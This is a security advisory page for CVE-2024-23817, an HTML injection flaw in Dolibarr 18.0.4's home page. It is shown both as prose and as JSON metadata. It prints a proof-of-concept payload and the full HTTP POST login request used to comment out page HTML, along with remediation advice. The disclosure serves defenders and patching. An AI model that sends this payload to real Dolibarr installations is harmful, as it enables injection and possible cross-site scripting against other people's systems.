ghsa-7947-48q7-cp5m
Vulnerability from github
Published
2024-04-18 16:42
Modified
2024-04-18 16:42
Severity ?
7.1 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N
Summary
Dolibarr Application Home Page has HTML injection vulnerability
Details

Summary

Observed a HTML Injection vulnerbaility in the Home page of Dolibarr Application. This vulnerability allows an attacker to inject arbitrary HTML tags and manipulate the rendered content in the application's response. Specifically, I was able to successfully inject a new HTML tag into the returned document and, as a result, was able to comment out some part of the Dolibarr App Home page HTML code. This behavior can be exploited to perform various attacks like Cross-Site Scripting (XSS).

Details

  1. Navigate to the login page of Dolibarr application.
  2. Submit a login request with the following payload in an arbitrarily supplied body parameter: "u70ea%22%3e%3c!--HTML_Injection_By_Sai"=1

HTTP Post Request: POST /dolibarr/index.php?mainmenu=home HTTP/1.1 Host: 192.168.37.129 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Referer: http://192.168.37.129/dolibarr/index.php Content-Type: application/x-www-form-urlencoded Content-Length: 375 Origin: http://192.168.37.129 Connection: close Cookie: Upgrade-Insecure-Requests: 1

token=697c1f303ef1976a713eda01d20d8eab&actionlogin=login&loginfunction=loginfunction&backtopage=&tz=5.5&tz_string=Asia%2FKolkata&dst_observed=0&dst_first=&dst_second=&screenwidth=1280&screenheight=587&dol_hide_topmenu=&dol_hide_leftmenu=&dol_optimize_smallscreen=&dol_no_mouse_hover=&dol_use_jmobile=&username=admin&password=manikanta&u70ea%22%3e%3c!--HTML_Injection_By_Sai=1

  1. Upon successful injection of the payload, some part of Home page HTML code was commented out.

POC Kindly go through the below video for detailed steps:

https://user-images.githubusercontent.com/26869643/294010332-ff88d80b-cb26-4870-82d3-fb49f7ecc32f.mp4

Remediation Suggestion Kindly validate and sanitize all user-supplied input, especially within HTML attributes, to prevent HTML injection attacks. Implement proper output encoding when rendering user-provided data to ensure it is treated as plain text rather than executable HTML.

Show details on source website

To clipboard 

{
  "affected": [
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "dolibarr/dolibarr"
      },
      "versions": [
        "18.0.4"
      ]
    }
  ],
  "aliases": [
    "CVE-2024-23817"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-79",
      "CWE-80"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2024-04-18T16:42:32Z",
    "nvd_published_at": "2024-01-25T20:15:41Z",
    "severity": "HIGH"
  },
  "details": "### Summary\nObserved a HTML Injection vulnerbaility in the Home page of Dolibarr Application. This vulnerability allows an attacker to inject arbitrary HTML tags and manipulate the rendered content in the application\u0027s response. Specifically, I was able to successfully inject a new HTML tag into the returned document and, as a result, was able to comment out some part of the Dolibarr App Home page HTML code. This behavior can be exploited to perform various attacks like Cross-Site Scripting (XSS).\n\n### Details\n1. Navigate to the login page of Dolibarr application.\n2. Submit a login request with the following payload in an arbitrarily supplied body parameter: \"**u70ea%22%3e%3c!--HTML_Injection_By_Sai\"=1**\n\n**HTTP Post Request:**\nPOST /dolibarr/index.php?mainmenu=home HTTP/1.1\nHost: 192.168.37.129\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate, br\nReferer: http://192.168.37.129/dolibarr/index.php\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 375\nOrigin: http://192.168.37.129\nConnection: close\nCookie: \u003cRedacted\u003e\nUpgrade-Insecure-Requests: 1\n\ntoken=697c1f303ef1976a713eda01d20d8eab\u0026actionlogin=login\u0026loginfunction=loginfunction\u0026backtopage=\u0026tz=5.5\u0026tz_string=Asia%2FKolkata\u0026dst_observed=0\u0026dst_first=\u0026dst_second=\u0026screenwidth=1280\u0026screenheight=587\u0026dol_hide_topmenu=\u0026dol_hide_leftmenu=\u0026dol_optimize_smallscreen=\u0026dol_no_mouse_hover=\u0026dol_use_jmobile=\u0026username=admin\u0026password=manikanta\u0026u70ea%22%3e%3c!--HTML_Injection_By_Sai=1\n\n3. Upon successful injection of the payload, some part of Home page HTML code was commented out.\n\n**POC**\nKindly go through the below video for detailed steps:\n\nhttps://user-images.githubusercontent.com/26869643/294010332-ff88d80b-cb26-4870-82d3-fb49f7ecc32f.mp4\n\n**Remediation Suggestion**\nKindly validate and sanitize all user-supplied input, especially within HTML attributes, to prevent HTML injection attacks.\nImplement proper output encoding when rendering user-provided data to ensure it is treated as plain text rather than executable HTML.",
  "id": "GHSA-7947-48q7-cp5m",
  "modified": "2024-04-18T16:42:32Z",
  "published": "2024-04-18T16:42:32Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/Dolibarr/dolibarr/security/advisories/GHSA-7947-48q7-cp5m"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-23817"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/Dolibarr/dolibarr"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Dolibarr Application Home Page has HTML injection vulnerability"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
  • Confirmed: The vulnerability is confirmed from an analyst perspective.
  • Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
  • Patched: This vulnerability was successfully patched by the user reporting the sighting.
  • Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
  • Not confirmed: The user expresses doubt about the veracity of the vulnerability.
  • Not patched: This vulnerability was not successfully patched by the user reporting the sighting.